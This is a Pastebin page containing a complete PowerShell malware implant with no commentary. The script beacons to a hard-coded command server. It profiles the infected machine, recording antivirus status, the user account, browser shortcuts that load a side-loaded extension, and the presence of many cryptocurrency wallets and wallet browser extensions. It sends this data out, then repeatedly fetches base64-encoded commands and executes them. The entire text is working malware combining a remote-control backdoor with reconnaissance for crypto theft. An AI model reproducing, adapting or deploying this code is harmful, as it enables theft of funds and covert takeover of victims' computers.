Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $meta_request = 'Z2V0IC92Mi8yMDgyNzM1MS03ODdmLTRkM2EtODcxYS03YTUwNjA3NjdkMzg/dj12ZXJfMiBodHRwLzEuMQ0KaG9zdDogbXB6dmNzeG5oLmNvbQ0KdXNlci1hZ2VudDogcG9zdG1hbnJ1bnRpbWUvNy4yOS4yDQphY2NlcHQ6ICovKg0KY2FjaGUtY29udHJvbDogbm8tY2FjaGUNCnBvc3RtYW4tdG9rZW46IGNkZWI2Y2JiLWRjYTUtNDMyNi04ZGZmLTNkYTQ3NzlkZTMwZg0KYWNjZXB0LWVuY29kaW5nOiBnemlwLCBkZWZsYXRlLCBicg0KY29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KY29udGVudC1sZW5ndGg6IDANCg0K';
- $meta_version = 8748389;
- $meta_guid = 91820;
- $meta_ip = '54.86.50.139';
- $meta_host = 'wmail-endpoint.com';
- ############################
- $createdNew = $false;
- $mutex = [System.Threading.Mutex]::new($true, "acb2f45f62c34c94bbd6e86734eb01a1", [ref]$createdNew);
- if ($createdNew -eq $false) {
- Start-Sleep -Seconds 300;
- return;
- }
- $_headers = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($meta_request)) -split "`r`n";
- $http_request = @{};
- $http_headers = @{};
- $_requestline = $_headers[0] -split ' ';
- $http_request.path = $_requestline[1].Replace('%7b', '{').Replace('%7d', '}');
- for ($i = 1; $i -lt $_headers.Length; $i++) {
- [string[]]$h = $_headers[$i] -split ': ';
- if ($h.Length -lt 2) {
- break;
- }
- $http_headers[$h[0]] = $h[1];
- }
- $session = @{};
- $session.id = -1;
- $session.update = $true;
- Add-Type -AssemblyName System.Net.Http
- $client = [System.Net.Http.HttpClient]::new();
- $client.Timeout = [TimeSpan]::FromMinutes(2);
- $client.BaseAddress = [Uri]::new("http://$($meta_host)");
- $client.DefaultRequestHeaders.Host = "$(-join ((97..122) | Get-Random -Count (Get-Random -Minimum 5 -Maximum 10) | % {[char]$_})).com";
- function WMI {
- param (
- $namespace,
- $class
- )
- try {
- return Get-WmiObject -Namespace $namespace -Class $class;
- }
- catch {
- }
- return $null;
- }
- function Get-AvStatus {
- param (
- $av
- )
- $status = "Unknown";
- try {
- $v = [uint32]::Parse($av.productState) -band 0xF000;
- switch ($v) {
- 0x0000 { $status = "Disabled" }
- 0x1000 { $status = "Enabled" }
- 0x2000 { $status = "Snoozed" }
- 0x3000 { $status = "Expired" }
- }
- }
- catch {
- }
- return "$($av.displayName) ($status)";
- }
- function Get-InstallStatus {
- param (
- $appname
- )
- $versionName = '';
- $active = 0;
- $inactive = 0;
- $rgx = New-Object 'System.Text.RegularExpressions.Regex' '\s?--load-extension=(("[^\r\n"]*")|([^\r\n\s]*))';
- $shell = New-Object -comObject WScript.Shell
- for ($searchPath_index = 0; $searchPath_index -lt $searchPaths.Count; $searchPath_index++) {
- $searchPath = $searchPaths[$searchPath_index];
- if ((Test-Path $searchPath) -eq $false) {
- continue;
- }
- $lnks = Get-ChildItem -Path $searchPath -Filter "*.LNK"
- foreach ($lnk in $lnks) {
- $lnkobj = $shell.CreateShortcut($lnk.FullName);
- $target = $lnkobj.TargetPath;
- if ([string]::IsNullOrEmpty($target)) {
- continue;
- }
- if ((Test-Path $target) -eq $false) {
- continue;
- }
- $target = (Resolve-Path -Path $target).Path.ToLower();
- if ($target.EndsWith($appname, 'OrdinalIgnoreCase')) {
- $enabled = $false;
- $arguments = $lnkobj.Arguments;
- if ($null -ne $arguments) {
- $m = $rgx.Match($arguments);
- if ($m.Success -eq $true) {
- $path = $m.Groups[1].Value;
- $path = $path.Trim('"');
- $enabled = ((Test-Path $path) -eq $true);
- if ($enabled) {
- try {
- $versionName = (Select-String -LiteralPath "$path\manifest.json" -Pattern '"version": "(.*)",').Matches.Groups[1].Value;
- }
- catch {
- }
- }
- }
- }
- if ($enabled) {
- $active++;
- }
- else {
- $inactive++;
- }
- }
- }
- }
- if (($active -eq 0) -and ($inactive -eq 0)) {
- return $null;
- }
- elseif ($inactive -gt 0) {
- return 'NOK';
- }
- return "OK($versionName)";
- }
- $searchPaths = @(
- "$env:USERPROFILE\Desktop",
- "$env:PUBLIC\Desktop",
- "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs",
- "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
- "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar",
- "$env:USERPROFILE\OneDrive\Desktop"
- );
- $searchEntries = @(
- [pscustomobject]@{
- root = '%appdata%'
- targets =
- [pscustomobject]@{
- name = 'Exodus-A'
- path = 'Exodus'
- },
- [pscustomobject]@{
- name = 'Atomic-A'
- path = 'Atomic Wallet'
- },
- [pscustomobject]@{
- name = 'Electrum-A'
- path = 'Electrum'
- },
- [pscustomobject]@{
- name = 'Ledger-A'
- path = 'Ledger Live'
- },
- [pscustomobject]@{
- name = 'Jaxx-A'
- path = 'Jaxx Liberty'
- },
- [pscustomobject]@{
- name = 'com.liberty.jaxx-A'
- path = 'com.liberty.jaxx'
- },
- [pscustomobject]@{
- name = 'Guarda-A'
- path = 'Guarda'
- },
- [pscustomobject]@{
- name = 'Armory-A'
- path = 'Armory'
- },
- [pscustomobject]@{
- name = 'DELTA-A'
- path = 'DELTA'
- },
- [pscustomobject]@{
- name = 'TREZOR-A'
- path = 'TREZOR Bridge'
- },
- [pscustomobject]@{
- name = 'Bitcoin-A'
- path = 'Bitcoin'
- },
- [pscustomobject]@{
- name = 'binance-A'
- path = 'binance'
- }
- },
- [pscustomobject]@{
- root = '%localappdata%'
- targets =
- [pscustomobject]@{
- name = 'Blockstream-A'
- path = 'Blockstream Green'
- },
- [pscustomobject]@{
- name = 'Coinomi-A'
- path = 'Coinomi'
- }
- },
- [pscustomobject]@{
- root = '%localappdata%\Google\Chrome\User Data\Default\Extensions'
- targets =
- [pscustomobject]@{
- name = 'Metamask-C'
- path = 'nkbihfbeogaeaoehlefnkodbefgpgknn'
- },
- [pscustomobject]@{
- name = 'MEWcx-C'
- path = 'nlbmnnijcnlegkjjpcfjclmcfggfefdm'
- },
- [pscustomobject]@{
- name = 'Coin98-C'
- path = 'aeachknmefphepccionboohckonoeemg'
- },
- [pscustomobject]@{
- name = 'Binance-C'
- path = 'fhbohimaelbohpjbbldcngcnapndodjp'
- },
- [pscustomobject]@{
- name = 'Jaxx-C'
- path = 'cjelfplplebdjjenllpjcblmjkfcffne'
- },
- [pscustomobject]@{
- name = 'Coinbase-C'
- path = 'hnfanknocfeofbddgcijnmhnfnkdnaad'
- }
- },
- [pscustomobject]@{
- root = '%localappdata%\Microsoft\Edge\User Data\Default\Extensions'
- targets =
- [pscustomobject]@{
- name = 'Metamask-E'
- path = 'ejbalbakoplchlghecdalmeeeajnimhm'
- },
- [pscustomobject]@{
- name = 'Coinomi-E'
- path = 'gmcoclageakkbkbbflppkbpjcbkcfedg'
- }
- },
- [pscustomobject]@{
- root = '%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\Extensions'
- targets =
- [pscustomobject]@{
- name = 'Metamask-B'
- path = 'nkbihfbeogaeaoehlefnkodbefgpgknn'
- },
- [pscustomobject]@{
- name = 'MEWcx-B'
- path = 'nlbmnnijcnlegkjjpcfjclmcfggfefdm'
- },
- [pscustomobject]@{
- name = 'Coin98-B'
- path = 'aeachknmefphepccionboohckonoeemg'
- },
- [pscustomobject]@{
- name = 'Binance-B'
- path = 'fhbohimaelbohpjbbldcngcnapndodjp'
- },
- [pscustomobject]@{
- name = 'Jaxx-B'
- path = 'cjelfplplebdjjenllpjcblmjkfcffne'
- },
- [pscustomobject]@{
- name = 'Coinbase-B'
- path = 'hnfanknocfeofbddgcijnmhnfnkdnaad'
- }
- }
- );
- function Get-Apps {
- $results = New-Object Collections.Generic.List[string];
- $appEntries = @('chrome.exe', 'brave.exe', 'msedge.exe');
- foreach ($appEntry in $appEntries) {
- $status = Get-InstallStatus $appEntry;
- if ($null -eq $status) {
- continue;
- }
- $results.Add("$([System.IO.Path]::GetFileNameWithoutExtension($appEntry))-$($status)");
- }
- foreach ($entry in $searchEntries) {
- $rootdir = [System.Environment]::ExpandEnvironmentVariables($entry.root);
- foreach ($target in $entry.targets) {
- if ((Test-Path -Path (Join-Path -Path $rootdir -ChildPath $target.path))) {
- $results.Add($target.name)
- }
- }
- }
- return [string]::Join(', ', $results);
- }
- function Get-UserInfo {
- $os = WMI "root\cimv2" "Win32_OperatingSystem";
- $avs = New-Object 'Collections.Generic.List[string]';
- WMI "root\SecurityCenter" "AntiVirusProduct" | ForEach-Object { $avs.Add((Get-AvStatus $_)) }
- WMI "root\SecurityCenter2" "AntiVirusProduct" | ForEach-Object { $avs.Add((Get-AvStatus $_)) }
- $info = @{
- os = "$($os.Caption) ($($os.OSArchitecture))";
- cm = "$($env:USERDOMAIN)\$($env:USERNAME)";
- av = "$([string]::Join(', ', $avs))";
- apps = [string](Get-Apps);
- ip = $meta_ip;
- ver = (($http_request.path | Select-String -Pattern '\?v=(.*)&?').Matches.Groups[1].Value);
- }
- return ConvertTo-Json $info -Compress;
- }
- function Get-UserID {
- if ($session.id -ne -1) {
- return $session.id;
- }
- $ms = New-Object 'System.IO.MemoryStream'
- $ms.Write([BitConverter]::GetBytes([uint32]$meta_version), 0, 4);
- $ms.WriteByte(1);
- $ms.Write([BitConverter]::GetBytes([uint32]$meta_guid), 0, 4);
- $data = $ms.ToArray();
- $ms.Dispose();
- $r = $client.PostAsync('', [Net.Http.ByteArrayContent]::new($data)).GetAwaiter().GetResult();
- $sts = $r.EnsureSuccessStatusCode();
- $res = $r.Content.ReadAsByteArrayAsync().GetAwaiter().GetResult();
- $r.Dispose();
- if ($res.Length -ne 4) {
- throw "";
- }
- $session.id = [BitConverter]::ToInt32($res, 0);
- return $session.id;
- }
- function Get-Updates {
- $uid = Get-UserId;
- $ms = New-Object 'System.IO.MemoryStream'
- $ms.Write([BitConverter]::GetBytes([uint32]$meta_version), 0, 4);
- $ms.WriteByte(2);
- $ms.Write([BitConverter]::GetBytes([int]$uid), 0, 4);
- if ($session.update) {
- $_userinfo = '';
- try {
- $_userinfo = Get-UserInfo;
- }
- catch {
- $_userinfo = ConvertTo-Json @{
- error = $_.Exception.Message;
- line = $_.Exception.Line;
- offset = $_.Exception.Offset;
- }
- }
- [byte[]]$userinfo = [Text.Encoding]::UTF8.GetBytes($_userinfo);
- $ms.Write($userinfo, 0, $userinfo.Length);
- }
- $data = $ms.ToArray();
- $ms.Dispose();
- $r = $client.PostAsync('', [Net.Http.ByteArrayContent]::new($data)).GetAwaiter().GetResult();
- $sts = $r.EnsureSuccessStatusCode();
- $res = $r.Content.ReadAsByteArrayAsync().GetAwaiter().GetResult();
- $r.Dispose();
- if ($res.Length -lt 4) {
- throw "";
- }
- $f = [BitConverter]::ToUInt32($res, 0);
- $session.update = ($f -band 0x1) -eq 1;
- if ($res.Length -gt 4) {
- return ([Text.Encoding]::UTF8.GetString($res, 4, $res.Length - 4));
- }
- return $null;
- }
- function Set-Updates {
- param (
- [string]
- $command
- )
- $lines = $command -split "`r`n";
- foreach ($line in $lines) {
- $job = Start-Job -ScriptBlock ([Scriptblock]::Create([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($line))))
- Wait-Job -Job $job -Timeout 10
- }
- }
- $retry = 0;
- [byte[]]$res = $null;
- while ($retry -lt 10) {
- try {
- $updates = Get-Updates;
- $retry = 0;
- if ($null -ne $updates) {
- Set-Updates $updates;
- }
- }
- catch {
- $retry++;
- Start-Sleep -Seconds 10;
- continue;
- }
- Start-Sleep -Seconds 30;
- }
Add Comment
Please, Sign In to add comment